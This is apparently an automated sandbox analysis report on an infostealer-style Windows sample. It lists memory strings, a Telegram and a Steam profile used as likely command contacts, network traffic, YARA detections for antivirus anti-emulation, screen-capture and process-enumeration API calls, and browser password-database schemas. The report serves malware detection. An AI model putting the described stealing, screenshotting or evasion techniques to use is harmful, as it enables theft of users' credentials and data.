                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: HCAEBF.1.drString found in binary or memory: https://support.mozilla.org
                  Source: HCAEBF.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: HCAEBF.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                  Source: file.exe, 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
                  Source: RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: IJECAE.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: IJECAE.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: HCAEBF.1.drString found in binary or memory: https://www.mozilla.org
                  Source: HCAEBF.1.drString found in binary or memory: https://www.mozilla.org#
                  Source: HCAEBF.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                  Source: HCAEBF.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                  Source: HCAEBF.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.6:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.6:49711 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_004112FD

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.3a7ac0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.3a7ac0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC9B8C0 rand_s,NtQueryVirtualMemory,1_2_6CC9B8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC9B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,1_2_6CC9B910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC9B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6CC9B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC3F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6CC3F280
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003969680_2_00396968
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003933D00_2_003933D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041C07A1_2_0041C07A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041E1901_2_0041E190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041BB291_2_0041BB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041CCA71_2_0041CCA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC335A01_2_6CC335A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC76CF01_2_6CC76CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC46C801_2_6CC46C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCAAC001_2_6CCAAC00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC75C101_2_6CC75C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC82C101_2_6CC82C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC70DD01_2_6CC70DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC4FD001_2_6CC4FD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC5ED101_2_6CC5ED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC3BEF01_2_6CC3BEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC4FEF01_2_6CC4FEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC55E901_2_6CC55E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC94EA01_2_6CC94EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC82E4E1_2_6CC82E4E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC59E501_2_6CC59E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC73E501_2_6CC73E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCA6E631_2_6CCA6E63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC77E101_2_6CC77E10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC99E301_2_6CC99E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC3DFE01_2_6CC3DFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC66FF01_2_6CC66FF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC49F001_2_6CC49F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC758E01_2_6CC758E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC588501_2_6CC58850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC5D8501_2_6CC5D850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC478101_2_6CC47810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC7B8201_2_6CC7B820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC848201_2_6CC84820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC929901_2_6CC92990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC3C9A01_2_6CC3C9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC6D9B01_2_6CC6D9B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC5A9401_2_6CC5A940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC4D9601_2_6CC4D960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC8B9701_2_6CC8B970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC78AC01_2_6CC78AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC51AF01_2_6CC51AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCABA901_2_6CCABA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC64AA01_2_6CC64AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC4CAB01_2_6CC4CAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCA2AB01_2_6CCA2AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC79A601_2_6CC79A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC464C01_2_6CC464C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC5D4D01_2_6CC5D4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC3D4E01_2_6CC3D4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC934A01_2_6CC934A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC9C4A01_2_6CC9C4A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC454401_2_6CC45440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCA545C1_2_6CCA545C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCA542B1_2_6CCA542B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC985F01_2_6CC985F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC605121_2_6CC60512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCA76E31_2_6CCA76E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC9E6801_2_6CC9E680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC546401_2_6CC54640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC3C6701_2_6CC3C670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC856001_2_6CC85600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC877A01_2_6CC877A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC777101_2_6CC77710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCA50C71_2_6CCA50C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC5C0E01_2_6CC5C0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC660A01_2_6CC660A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC7F0701_2_6CC7F070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC751901_2_6CC75190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCAB1701_2_6CCAB170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC7E2F01_2_6CC7E2F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC322A01_2_6CC322A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCA53C81_2_6CCA53C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC3F3801_2_6CC3F380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC353401_2_6CC35340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC4C3701_2_6CC4C370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC7D3201_2_6CC7D320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CD3ECD01_2_6CD3ECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CCDECC01_2_6CCDECC0
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00385050 appears 48 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CC794D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CC6CBE8 appears 134 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 311 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004180A8 appears 104 times
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.3a7ac0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.3a7ac0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/27@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC97030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,1_2_6CC97030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004111BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,1_2_004106C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199689717899[1].htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, sqls[1].dll.1.dr, nss3[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: BFCFBK.1.dr, KEGCBF.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
